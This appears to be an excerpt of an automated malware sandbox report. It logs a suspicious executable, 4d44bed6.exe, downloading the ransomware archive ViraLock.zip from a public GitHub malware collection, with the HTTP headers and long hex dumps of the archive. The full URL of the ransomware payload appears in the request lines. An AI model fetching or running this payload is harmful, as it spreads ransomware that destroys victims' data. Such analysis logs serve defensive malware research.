                                                                                                                                                2022-09-29 12:51:25 UTC3903INData Raw: db 4d 9f ea 35 ae e5 89 e7 8f 3b 8b 67 a6 81 55 3c 72 bc f3 8c 7d 60 33 a5 5e 59 85 b5 d2 7d f1 2c aa c6 1d a2 fa ad 35 1f c9 5c 39 04 8c e7 26 e9 33 d0 49 2f a3 82 ee 2c a7 0d 5a 9e 16 ca 5f 93 ce a6 f3 e1 97 3b 75 28 be 67 c0 c2 ad 26 c8 b0 5b 41 12 6d d7 1f 29 dd f2 cc e1 cd 71 05 14 47 63 96 fd cc d9 43 a4 30 75 0c 82 69 51 43 83 c4 fc 22 d0 5e 87 a8 68 6a 10 28 8e ba a2 13 93 77 ec fd 92 c4 cd ea 24 7d 7d 26 7f ba 79 33 97 f1 cb 2b e0 ed af 8f da e9 89 7c 25 9b 55 be 49 b5 2b 56 6c fd 1c 76 2c f3 de c7 4d 5f f9 cc e1 c9 ba 8a 14 97 7f 08 c1 f8 81 4d 03 2c 10 24 ec 84 6b e5 ec fb 80 55 d7 d8 f5 93 c2 c9 e6 7e cd 14 08 a4 e2 79 e2 19 84 b1 b9 15 11 01 c0 7d d5 75 5f 63 57 19 e8 b5 ac 27 a4 16 5c 99 dd 43 9e 13 49 b8 18 9f 59 31 aa 9d d1 53 2a 35 75 9f
                                                                                                                                                Data Ascii: M5;gU<r}`3^Y},5\9&3I/,Z_;u(g&[Am)qGcC0uiQC"^hj(w$}}&y3+|%UI+Vlv,M_M,$kU~y}u_cW'\CIY1S*5u
                                                                                                                                                2022-09-29 12:51:25 UTC3919INData Raw: 97 0a 23 da b5 14 67 97 0d 54 3b 4e 05 83 47 27 85 34 67 98 4d 78 e5 14 46 b6 71 2f 3a 91 4e 6d 5f b1 0e f5 d3 52 cd 7f c3 e5 7f b2 94 09 8f d0 71 91 cc 52 8a 4b 64 d2 f9 29 9a 23 6d fb bd 88 57 e3 8d c7 6b 1f ca 29 67 15 91 2f 89 2f af 9f 3e e2 41 de fd e7 bb d8 e9 d8 d1 1a 7c eb 87 64 a0 e9 43 8c 32 ba 04 15 61 b0 14 17 37 0b 3e 94 22 30 f3 f0 a3 af 13 c6 88 a9 11 19 1c 85 92 a9 6a ff 12 7c cd c4 fa 5c 34 59 0a c7 8e b1 af 91 51 99 a5 3a e1 4d 94 4c 6b 8e a1 79 f8 17 ea 8c 6b 89 f1 5b 14 3b cb e3 16 1a 32 40 56 6a 3c 09 54 88 a6 c4 8c ab 06 2c 9f 72 d7 5f 88 e0 c1 93 cb cc 99 54 5c d9 b5 f8 84 22 18 73 53 08 ae 7f 69 63 25 6f 63 86 4a f0 c8 57 aa d1 13 fc 4e 5b 88 14 09 22 34 8b 9f 38 9d 1c f5 2d 80 6f 66 bd 10 b1 f7 0f 84 f2 4b ac 0b 00 e9 6d aa 5a 0a
                                                                                                                                                Data Ascii: #gT;NG'4gMxFq/:Nm_RqRKd)#mWk)g//>A|dC2a7>"0j|\4YQ:MLkyk[;2@Vj<T,r_T\"sSic%ocJWN["48-ofKmZ
                                                                                                                                                2022-09-29 12:51:25 UTC3935INData Raw: fe 2a f4 7a 55 78 0f 29 64 3e 10 08 47 42 16 bc 27 50 94 27 cb 6d 16 b7 9c b7 7e 06 4d 78 2c 7d 07 5c f6 43 b2 72 f4 bf 16 c1 18 37 1c 61 d9 b1 8b 63 7d 41 8c 7c f4 90 a4 5b d1 9d 24 25 b1 cd 5e 7f 91 35 51 c9 40 ce 1b 1d cc 60 51 34 69 5a 86 dd 59 9f 39 da c2 fc 59 5b 9b 16 0e c6 2a 47 3d 99 77 fc 36 18 bc b8 11 48 69 9b 3f 37 be ec 69 f7 a9 aa ac 6c 73 64 0a 5a 61 85 ba d8 98 f2 40 3b a0 cc 63 da 91 54 38 00 ce 2f 29 4a 4d 96 1f 15 db f8 73 70 14 e6 c8 64 a9 d0 5e 58 e2 40 50 59 9f d6 9f db b2 6d 60 2e 01 1e 39 13 45 73 04 ed 06 d6 04 9f 22 dc 52 6a 87 d2 64 85 4d 75 c3 6f 17 58 da 20 97 45 46 00 d9 d7 c5 8a 46 dd dd 89 6c d1 9d 94 f3 b3 29 c2 c6 02 e2 15 f3 f4 e2 af 4d 7d 43 09 ee 49 ea 73 79 0c 6b 1a 22 eb 04 f1 16 5c c4 a8 30 e7 89 20 46 66 7a 5b fe
                                                                                                                                                Data Ascii: *zUx)d>GB'P'm~Mx,}\Cr7ac}A|[$%^5Q@`Q4iZY9Y[*G=w6Hi?7ilsdZa@;cT8/)JMspd^X@PYm`.9Es"RjdMuoX EFFl)M}CIsyk"\0 Ffz[
                                                                                                                                                2022-09-29 12:51:25 UTC3951INData Raw: c3 f6 ca 90 3f 35 02 23 23 b3 1f 45 e2 e8 9b 43 b3 ac 40 50 5a bc 3b 68 06 cf 96 a5 94 a2 a5 88 b4 da 79 f6 82 c1 73 2f fb d9 0a c0 65 f3 68 6f 90 ab 46 2b e1 c7 53 a6 66 0a 17 9f c1 da 3b 0a 51 d8 93 28 4e d1 8a e1 a9 3a aa b3 4d 21 34 07 1b 93 fe 2e e1 c3 22 23 88 49 95 4a 9f a7 51 29 00 3b 05 6c 00 c4 41 67 a2 5a ed ce d2 8d d8 df ed 9d 26 f1 62 e6 3c 32 8f 70 87 e6 c5 ee 0c 0b 64 06 41 42 8a 26 ff f7 4e 82 f5 8b a8 16 64 49 65 a4 23 13 b4 a6 cc ab f4 5a 57 4f 88 5a 9a dc 76 c0 f7 94 d8 c4 7b 07 aa 72 14 9c 69 23 97 53 ea b7 c0 3d 03 e9 be ff c9 da 99 63 07 1b a0 98 97 1a 4e d6 d2 f3 40 15 05 59 5b f7 a2 43 3b 82 25 f2 88 98 1c c5 67 39 90 63 00 fe 86 13 69 07 72 49 c5 8a 9a 21 24 6b 10 2a c9 4b bf 6d 30 5b a4 bc 39 a6 8c 4f f5 17 ed d8 b0 b2 17 a9 6d
                                                                                                                                                Data Ascii: ?5##EC@PZ;hys/ehoF+Sf;Q(N:M!4."#IJQ);lAgZ&b<2pdAB&NdIe#ZWOZv{ri#S=cN@Y[C;%g9cirI!$k*Km0[9Om
                                                                                                                                                2022-09-29 12:51:25 UTC3967INData Raw: a8 a2 f6 ce ed e2 57 97 b3 ff d0 54 2d 69 00 82 f8 16 79 33 d6 df 2a 97 9e 3f 06 a8 9a 84 0d e1 ef f9 53 09 0f 9f e3 22 3a 6c 86 9e d5 77 ef f6 50 55 8b 1b b1 81 15 4a e0 7d aa 94 2e d5 a8 a8 ab 5d 94 50 cf b4 b7 a9 8c f8 c7 99 44 61 88 fa 81 e6 6a 2b 0a c4 92 00 8a 4c 04 14 c2 bf 0d 00 be 28 a9 2c db ed fb f5 ab 98 77 1c 46 eb 62 e2 0a ed 8a aa 32 bb 1d d5 d7 6a b3 fc be 77 5f 9c 3b 14 cb 5d 66 04 e3 c0 09 df 8e f7 b6 17 40 96 da 73 05 2b 80 2a cb 14 41 33 7c 3d 84 a2 2b 6f 7a 20 01 25 aa 5b 41 8d a0 3c 78 0b 4a 61 e7 ea 36 dc 25 0e 1a 58 bc 34 1f c9 56 2b 3b 5f b1 ce 80 2c 79 9e c0 c7 aa 55 6d 6a 97 d0 e4 34 53 8b 1a a8 42 dd 37 f7 65 66 9d 06 01 47 1f 1a b1 e7 4a 89 9a 38 df b9 63 da 60 98 70 56 77 37 83 03 ea 81 10 71 ed ab 97 73 24 14 c4 a5 4b ab 5f
                                                                                                                                                Data Ascii: WT-iy3*?S":lwPUJ}.]PDaj+L(,wFb2jw_;]f@s+*A3|=+oz %[A<xJa6%X4V+;_,yUmj4SB7efGJ8c`pVw7qs$K_
                                                                                                                                                2022-09-29 12:51:25 UTC3983INData Raw: ae 3b 31 5c 8a eb 36 c8 d7 30 11 6d 48 75 bd 7e 96 b0 b5 47 8a c7 de 77 49 27 c2 06 ed 2e b2 5f 1e cd 4a d6 79 20 cd 3e 6b ec b5 df 0d fa 9a 98 7f 57 0f 50 7a 77 0f 17 f1 1e 14 f7 f2 1d 5f b5 e9 2a a8 78 77 82 9a cc e4 0f 68 4a 35 57 55 fa ff cb 4e 27 c9 b3 c3 64 78 df b4 13 3e 94 f2 3f 62 cd 99 8c d9 69 3f 22 8d 5d 54 ef 56 ed 25 1f dd be 36 df d5 7d 3b 55 15 49 0d 0f 8f 65 55 88 35 13 8b 56 55 bd 97 6a 97 a6 33 da aa 27 ae 55 48 44 c4 dd 48 0d be bb 6c fc 7c 43 63 26 72 d8 6f 3d 58 2e 0c 48 3e 75 8a 79 79 a3 aa e4 b3 79 2d 7b ff cf ff 9c 5a a3 b8 a3 99 71 62 0f 16 f5 1b 95 67 95 6d 32 77 1d 34 ce 94 a3 65 6a be d3 2d 92 60 ec 5b 71 31 9d 3b be a5 c2 0c 2b 71 ab 94 8e b6 9a 95 47 61 04 5a 0e 92 d0 dd da ab b6 75 5c 8b eb 33 cf f3 f8 8a 15 37 a7 29 76 e5
                                                                                                                                                Data Ascii: ;1\60mHu~GwI'._Jy >kWPzw_*xwhJ5WUN'dx>?bi?"]TV%6};UIeU5VUj3'UHDHl|Cc&ro=X.H>uyyy-{Zqbgm2w4ej-`[q1;+qGaZu\37)v


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                22192.168.2.549722140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:26 UTC3984OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:26 UTC3984INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:26 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:26 UTC3985INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                23192.168.2.549723185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:27 UTC3987OUTGET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:27 UTC3987INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 135339
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "2bb1943793128dcdbc238f30e0779c2b1525b546f66d38117659df251eb89cab"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0866:0543:E4C3D7:F301C9:6335934A
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:27 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6944-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455887.040995,VS0,VE109
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 6974b9bc1f56b6a9e853216d6200070c0a0fe321
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:27 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:27 UTC3988INData Raw: 50 4b 03 04 33 00 01 00 63 00 0f 37 79 45 00 00 00 00 e1 0f 02 00 00 0a 03 00 17 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 69 72 61 4c 6f 63 6b 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 ed 91 64 e0 a1 85 e8 a0 cb 45 4a 4b c9 6b 96 10 99 81 2b 1d 24 3f e8 58 3b ea ca db e6 a4 67 1e 00 e6 fb 80 0f 17 9c a3 3e dc 6a 4f b1 b5 79 ab 70 3a f8 64 1e 80 04 fd 7e c9 a6 7f a7 8a ef 2e 9b 59 cf 79 88 93 ad eb 12 51 f7 b1 0b a9 8e 69 79 e7 f5 b5 5c 8d f8 f4 8e 7d ed ba 1d bb 09 e9 56 19 73 4c 01 8e 40 74 d0 0f f6 3c fe 84 b8 c1 61 75 90 6c 3d 69 a8 71 d5 f5 77 9d c7 2a dd 12 60 a5 7f 68 fe 61 bd b2 eb dd 1d c8 ea 09 9f 33 5c c7 30 80 6f 78 93 69 b5 0f e7 43 98 b4 66 ee 98 8f 3d 7f 45 8d ff f2 1f e4 3e f7 f0 41 99 10 92 0f 32 d0 58 da 23 e0 71 6d 6c 3e dc 81 d2
                                                                                                                                                Data Ascii: PK3c7yEEndermanch@ViraLock.exeAEdEJKk+$?X;g>jOyp:d~.YyQiy\}VsL@t<aul=iqw*`ha3\0oxiCf=E>A2X#qml>
                                                                                                                                                2022-09-29 12:51:27 UTC3989INData Raw: 56 99 97 ec dd bd c9 a3 1c 46 69 0b 2b 24 34 4e 0b 95 8d 76 2d 58 38 52 4f 20 39 99 6d 2a fe d0 2e b8 42 ae f9 10 88 74 73 e5 7e c0 cc 2b a4 98 19 69 f7 64 22 43 e6 74 04 9d 46 ee 4a 82 66 48 db 27 b3 d0 4e 61 71 84 d2 65 98 de f7 5d 9d d9 8c ba 63 f1 e8 c7 4f 45 f6 c1 a4 7d 68 bb 12 3d 5f 27 98 42 fa b8 56 e6 21 f2 41 3d ad 36 6b 59 db b9 60 ff 46 c9 41 42 bf df 11 72 49 30 c1 60 14 20 e8 d5 84 09 05 16 4f ec 06 24 80 86 3b 09 e5 7e 5a 08 0e 5b 76 48 8a 81 ba d0 f0 1c 0f d6 41 87 a9 d9 72 5d ad 99 8b cb 5f e0 05 9d 9c a2 54 df 32 a0 18 45 61 40 e4 c2 a5 1d 6e 77 72 79 19 39 e0 d8 99 17 54 8f 59 02 5b 4f 4e 23 68 38 6c 26 bd e8 97 be 3b a6 67 d5 5b 6a d7 81 45 31 54 6e 37 ea 4e f3 94 f9 36 f7 d5 a1 a7 f6 2f e6 77 08 ff 66 3d 3f b3 f9 8f d6 8d 7f bc ce cf
                                                                                                                                                Data Ascii: VFi+$4Nv-X8RO 9m*.Bts~+id"CtFJfH'Naqe]cOE}h=_'BV!A=6kY`FABrI0` O$;~Z[vHAr]_T2Ea@nwry9TY[ON#h8l&;g[jE1Tn7N6/wf=?
                                                                                                                                                2022-09-29 12:51:27 UTC3990INData Raw: f5 73 f7 5c 0a cf 7b f3 16 2b 3a ca 21 e5 d8 44 4d 88 72 d9 39 ef 8c 05 81 05 d0 b8 b8 70 fc 06 3f a1 66 dd 29 a5 e0 e5 ba d0 89 55 f1 a0 52 87 db 6d ef 02 c1 ab ae 21 fd e6 b6 3e b5 44 30 3b 1a 8e c7 11 7d b8 81 c2 99 2f 5a 35 40 27 51 3b da e6 23 68 49 2d fd 4d 8e 28 66 31 51 f2 31 71 84 89 1c 12 69 99 41 c2 54 69 52 75 ad e1 f2 4d d7 22 25 7a f5 2d 4b e3 35 d0 89 fe 11 eb 7a b3 3e 0f f5 08 85 55 ed e0 ec 23 ab e3 d5 25 ce 18 e6 f3 ae fb 59 25 c3 4d 50 61 b8 7a 3b 59 58 f6 26 6b f0 2c bf c1 cb 44 25 93 e1 87 7e 17 ad 8f 2c fd 51 14 22 7f dd 65 5c 48 cc 50 73 0e da 12 ca 38 78 0e bb de 2a 2f 3b b1 1f ba 3f 2a f8 a7 5d 74 7e e0 f1 43 a4 f8 81 67 92 4a d6 f4 53 67 b8 07 ba e6 10 ef 45 cc 7a db f2 72 ed fb b7 f9 fd 0c 25 9d 33 94 81 7b 81 d5 39 9d f9 06 78
                                                                                                                                                Data Ascii: s\{+:!DMr9p?f)URm!>D0;}/Z5@'Q;#hI-M(f1Q1qiATiRuM"%z-K5z>U#%Y%MPaz;YX&k,D%~,Q"e\HPs8x*/;?*]t~CgJSgEzr%3{9x
                                                                                                                                                2022-09-29 12:51:27 UTC3992INData Raw: a9 4a 12 99 f3 8a cb b7 28 6e 50 53 e4 11 5f 97 cc da b7 72 1a d5 8a 6a 7a 06 ac 26 7c 38 6e da 6b 81 ee a4 5d 7d b9 8f 22 0e 32 0e 0c 36 7a 72 bc a6 8a 22 4e de 4f 02 d4 31 61 57 64 4c 4e a3 8b 1e 1e 5e ae 58 9a 5f 6e 7f 57 77 5b 77 5a 83 9f ba ed 15 c0 45 23 4b 32 9e 7f 5d 61 b7 ac 02 5c d2 a2 8d 38 6e 67 f8 81 6d cc b9 d7 a3 08 a2 28 7f b9 32 c7 4d 90 00 b5 46 1e 92 10 74 ee ea f7 d2 e0 b4 96 50 e2 f9 a5 8a c2 83 6c b9 d9 82 06 97 b5 2d 74 1a 5d 38 f4 f8 40 d5 77 4c 2b 6c be 2a e9 58 a0 a5 a8 73 10 09 52 e2 8f e6 e9 d1 d0 eb 37 59 66 56 73 57 c4 08 64 c7 0b c7 2a 4f 3b 38 2f 56 2d ab fc 23 6c 69 38 83 7b 66 d1 9b a9 61 79 65 1b 8d 80 0f 48 27 0d 20 55 da c1 84 9f 41 1a 06 17 13 10 47 ce 44 30 5a 89 be 1c 70 d9 52 44 62 6d ae a7 f9 88 c8 a5 84 e8 d1 0b
                                                                                                                                                Data Ascii: J(nPS_rjz&|8nk]}"26zr"NO1aWdLN^X_nWw[wZE#K2]a\8ngm(2MFtPl-t]8@wL+l*XsR7YfVsWd*O;8/V-#li8{fayeH' UAGD0ZpRDbm
                                                                                                                                                2022-09-29 12:51:27 UTC3993INData Raw: 4f d7 0a 1b 04 ac 66 0d c3 85 da 2a eb 77 91 f3 ed f7 69 36 47 c1 be 9d d1 94 34 8c a3 a1 8b f5 c8 14 aa 5d c7 5b 5e f8 2f 16 1b ea 66 fa d6 17 5d d3 f4 29 09 b2 17 58 de 34 ab 64 49 6a d4 7f 36 a9 8e bf 21 1d 6e 32 a6 72 9a ae ee 95 5e 4a 7e fa 43 43 fa ca ab 2f 18 03 83 db bc ac 67 3e e6 b6 67 4d 20 d9 d9 3d e2 48 c3 e6 dc 59 6e f0 53 93 43 d0 f4 fe 25 04 76 55 69 88 11 ea 1d 1a a6 b5 50 32 bc 7f 26 58 29 66 ae b6 23 b9 f9 d4 20 6c 4f ed 06 0c 55 70 4b d1 a4 93 06 52 d3 25 c2 8b df 82 03 62 c7 a7 48 3d 65 cd 19 49 0d d7 4f cc f8 6e 9f 4e 22 a1 d6 a7 fd ff 63 f6 05 72 9d f5 20 55 ae a9 57 c1 f8 b8 5c 39 25 2a da 4e b5 c0 93 b6 cd f4 6b 7f 73 cd 39 00 dd c3 4f 24 6a 8d 82 f9 e1 e1 46 52 59 9f 3d d1 a1 47 ee f6 13 d8 bf 99 7b 62 f0 c2 ee a3 c3 88 a5 96 15
                                                                                                                                                Data Ascii: Of*wi6G4][^/f])X4dIj6!n2r^J~CC/g>gM =HYnSC%vUiP2&X)f# lOUpKR%bH=eIOnN"cr UW\9%*Nks9O$jFRY=G{b
                                                                                                                                                2022-09-29 12:51:27 UTC3994INData Raw: b1 b7 0d a1 61 43 b3 3c 2e a4 3c 30 97 9d a3 a2 7d 91 39 d1 27 75 43 96 47 5c 9b 94 47 c7 cf b2 f5 86 e8 63 e2 4c 1d af 4a 88 a5 23 82 12 c1 05 f4 d6 5b 51 88 c1 ea 55 13 f3 1d 18 bd 6e 2d ce dc 2a 98 03 0d cf 06 f9 de 9c 5d 8b 7d fe 23 20 86 a6 e5 ff 27 a7 76 75 90 10 c3 86 a8 23 20 9f d2 90 de 20 2a d5 6e e4 a0 79 cf 44 db 71 23 7c b7 98 3f 26 a1 92 41 42 6c cb 1b ed b5 ec 4b 28 14 62 35 97 c8 00 96 e3 2b 62 a9 a0 88 f3 b7 a3 f5 5c e4 f3 8f 6a 5e 8e 33 32 64 47 a2 e7 6f b8 ae 65 16 29 f2 df 79 ce d3 fe 0a 86 67 5d 04 de 70 c4 64 ec 40 bb c6 c1 1d 0e 01 d9 50 d1 4c d5 c3 20 19 63 45 31 06 96 5a 71 58 82 a4 81 ce 3a 6d e2 1b 10 eb 96 f0 78 65 df 8e fc 19 28 15 07 13 cb 38 67 7e 53 19 6e 63 9b cd ce ea de 0e 8b a2 46 55 10 38 77 ec 9c 29 c1 26 37 c9 7f 1e
                                                                                                                                                Data Ascii: aC<.<0}9'uCG\GcLJ#[QUn-*]}# 'vu# *nyDq#|?&ABlK(b5+b\j^32dGoe)yg]pd@PL cE1ZqX:mxe(8g~SncFU8w)&7
                                                                                                                                                2022-09-29 12:51:27 UTC3996INData Raw: 27 24 03 14 58 3a d2 bd c3 99 3f ae 30 8f 8c e2 54 75 ff 76 74 c6 fa 9c 05 49 bc fe b4 15 13 25 3a 5d 8c 4a e2 77 2f a1 e0 72 76 77 58 df 21 9a a7 99 1d f4 b8 be 3c 43 1d d0 2f cc fd 3e 34 d3 fc 2f 05 b2 e6 5e 3d 6e 18 7d 4d 8e 98 19 aa b3 42 80 b8 22 2c cb d7 82 a2 3d 41 e0 96 19 fa 90 8e 91 56 bb 3c b4 24 65 87 2e a7 3d 6e 25 9d 57 e7 4b 7e 68 be 8a 3c a0 4b 61 62 2a ea 10 d5 e2 03 60 d5 9a c3 36 fd 74 05 6c bd 23 a8 39 2c 78 5b 01 c2 74 db 03 78 26 34 1d b8 ad 34 7d 1c 92 10 8c 1b 96 f5 04 4c f5 4f 51 c8 19 78 47 8c 29 ff 88 cb ee 67 87 fd 4c a8 58 f5 5c 7d 14 24 cc 8a 79 ee a7 aa a0 31 a0 56 a3 c1 5c 26 64 7a 82 86 d8 dd 24 66 55 8f 4d dd ac fb 12 67 9f ca ac f5 52 7d 40 c7 a7 ab d5 26 98 77 e6 c4 ef 5d b7 36 83 8e 4c 1c 6e 4f b3 80 e8 9e 26 74 8a 2a
                                                                                                                                                Data Ascii: '$X:?0TuvtI%:]Jw/rvwX!<C/>4/^=n}MB",=AV<$e.=n%WK~h<Kab*`6tl#9,x[tx&44}LOQxG)gLX\}$y1V\&dz$fUMgR}@&w]6LnO&t*
                                                                                                                                                2022-09-29 12:51:27 UTC3997INData Raw: 08 4d 6b b0 06 1c 14 79 60 fe cc 58 9a 14 9c 55 df fa fb 33 18 96 e2 0d 76 d1 bd f5 01 9a 6f 0f a0 18 c8 f9 48 63 c1 ad 20 5f 3e 10 b9 34 cb d6 b4 55 64 e0 c2 4d 58 83 81 6b b5 7d d7 26 b7 1a a8 4d 79 49 3f c1 8a 59 a4 7d 61 9d 13 53 46 dc 7e 82 bb cc 25 9f 82 a0 3c ba 71 e2 ad 43 30 cf f3 7c d0 8f 38 ae b3 e6 24 47 6d e6 99 92 33 68 a3 9c db 6a f3 24 96 f7 76 5a 48 7e 06 be 7f dd 93 e1 98 78 c4 bf 03 0b 99 bf 8b 3b dd 7e 5a 98 58 ef 28 a2 5c e3 87 1d ea 2e fe 9d 64 b3 54 30 83 b4 40 24 7b 15 75 c3 52 f5 e0 fc b2 19 6f e2 46 60 e8 73 04 01 03 f9 6f 4d 47 3d d1 42 18 62 94 e5 5a ec 2f db d2 68 4f f6 17 3e b2 cf 69 64 9e f2 ec 43 85 12 e2 8c d6 fb 32 71 42 4b 1f 6e 49 bb 30 8f 7a 9c 63 b7 3d 1f 23 32 a0 e2 b3 a4 71 1d 9b 75 b0 b8 ca 68 25 7c d5 30 27 40 ad
                                                                                                                                                Data Ascii: Mky`XU3voHc _>4UdMXk}&MyI?Y}aSF~%<qC0|8$Gm3hj$vZH~x;~ZX(\.dT0@${uRoF`soMG=BbZ/hO>idC2qBKnI0zc=#2quh%|0'@
                                                                                                                                                2022-09-29 12:51:27 UTC3998INData Raw: a0 65 ae 1f 8e da 70 24 61 b8 7f d4 a7 65 2b e8 00 76 75 02 3e c7 24 b1 3e 2e 86 13 c6 27 4e ca 57 bc 6b c9 6f e7 6f 0b 5d e9 b5 06 c2 4d 31 6a a1 85 4b 31 7f 00 27 ec 30 69 16 92 3b dd 26 b0 d2 9a 37 11 85 82 2c 4c 3d 52 00 00 24 48 a8 df f6 39 47 5c 7c f6 14 ea da c1 45 fa 09 57 53 0d 93 20 81 63 92 68 5d 78 6d 08 81 00 ef 87 3a bf eb a6 94 20 d2 04 8c 12 a2 8f ee a7 0c 80 1c 38 33 97 c5 c2 37 d3 88 34 1c 43 81 56 76 97 6e 46 e7 02 03 18 1b 5b 02 ec 75 92 82 8c ba 5e 91 a7 b7 4b 2e ae 84 9b b2 c5 7e b0 cd 1f e1 a1 98 69 1c 47 b9 70 4e ef a8 5b 84 fb fc 30 17 3d 95 5e 72 4c 59 32 1f 26 50 41 4f 62 8a ab db 28 94 72 28 87 9d 6d 73 b9 5c a7 fc d8 ba a8 33 bb 53 18 3d 5d 80 91 7e 91 3a 62 a5 ca d0 89 92 7e fa 7d e7 be e0 43 8e 1c 41 a3 f9 4f 80 6c cd 9b da
                                                                                                                                                Data Ascii: ep$ae+vu>$>.'NWkoo]M1jK1'0i;&7,L=R$H9G\|EWS ch]xm: 8374CVvnF[u^K.~iGpN[0=^rLY2&PAOb(r(ms\3S=]~:b~}CAOl
                                                                                                                                                2022-09-29 12:51:27 UTC4000INData Raw: e2 2b 94 38 7c 73 9d 10 17 69 09 fc c0 91 07 1b 70 8e f9 3a 5e 3c 29 20 37 0c e5 26 70 31 9a 4f 96 b0 33 e9 8b cf b2 4d b9 23 2b 77 ed 3f b9 14 7d 27 4c 53 61 95 68 96 30 23 b7 18 ef 90 55 7e fc 57 d2 7e 60 60 25 3c 2a 08 c5 8e 3f 7e 11 2b 43 77 28 78 b2 c6 b7 19 99 c0 59 4e de ce 8d 82 2b 3f 92 ec c8 f8 f5 96 af f8 f9 00 5c 6d b5 96 2e ce 26 29 24 e9 c1 6b 69 d1 5a 41 70 21 cb f5 44 46 a3 ac 81 30 26 8e a8 75 cb 02 c6 f8 51 0e 7b 17 39 55 d8 4b ed 1c 26 ec 2f be 87 4b 55 89 27 a6 9f 5e 1c 10 52 b0 77 d9 6b 80 96 29 13 00 79 48 57 4e 6b 13 63 43 a4 2e c2 31 c7 23 09 cd 05 cb 55 31 c7 a2 c7 8e b9 ba 1d 86 a2 5d 43 4e a7 d8 e0 d6 d1 2a 36 73 cc 42 aa e6 e7 78 55 bc bf ca 0b 76 a9 e8 89 1b 83 9f de 36 10 2b 57 55 08 46 87 d4 b3 a9 7f a9 67 68 a1 4f 33 a7 ed
                                                                                                                                                Data Ascii: +8|sip:^<) 7&p1O3M#+w?}'LSah0#U~W~``%<*?~+Cw(xYN+?\m.&)$kiZAp!DF0&uQ{9UK&/KU'^Rwk)yHWNkcC.1#U1]CN*6sBxUv6+WUFghO3
